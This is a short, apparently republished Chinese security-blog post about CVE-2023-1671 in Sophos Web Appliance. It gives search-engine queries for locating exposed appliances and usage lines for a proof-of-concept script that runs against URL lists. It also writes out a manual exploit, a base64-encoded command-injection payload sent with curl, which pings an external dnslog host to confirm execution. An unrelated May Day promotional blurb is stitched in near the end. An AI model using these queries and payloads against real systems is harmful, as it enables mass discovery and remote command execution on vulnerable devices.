fofa
(title="Sophos Web Appliance" || app="Sophos-Web-Appliance") && title!="Sophos Web Appliance:错误请求"ZoomEye
title:"Sophos Web Appliance"-title:"Sophos Web Appliance: Forbidden"-title:"Sophos Web Appliance: Bad Request"Shodan
title:"Sophos Web Appliance"Usage
python CVE-2023-1671-POC.py -u http://www.example.compython CVE-2023-1671-POC.py -u http://www.example.com -d xxxxxx.dnslog.cnpython CVE-2023-1671-POC.py -f urls.txtpython CVE-2023-1671-POC.py -f urls.txt -d xxxxxx.dnslog.cn
or without this script file:
echo -n "';ping xxxxx.dnslog.cn -c 3 #" | base64# JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM= --> JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICMcurl -k --trace-ascii % "http://www.example.com/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=12345&filetype=12345&user=12345&user_encoded=JztwaW5nIHh4eHh4LmRuc2xvZy5jbiAtYyAzICM"
Reference
https://vulncheck.com/blog/cve-2023-1671-analysis
项目地址:https://github.com/W01fh4cker/CVE-2023-1671-POC
国际劳动节又称“五一国际劳动节”“国际示威游行日”(英语:International Workers' Day,May Day),是世界上80多个国家的全国性节日。定在每年的五月一日。它是全世界劳动人民共同拥有的节日" 夏日消费节 ",进一步促进消费,助力实体。
原文始发于微信公众号(Ots安全):CVE-2023-1671-POC,基于dnslog平台
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论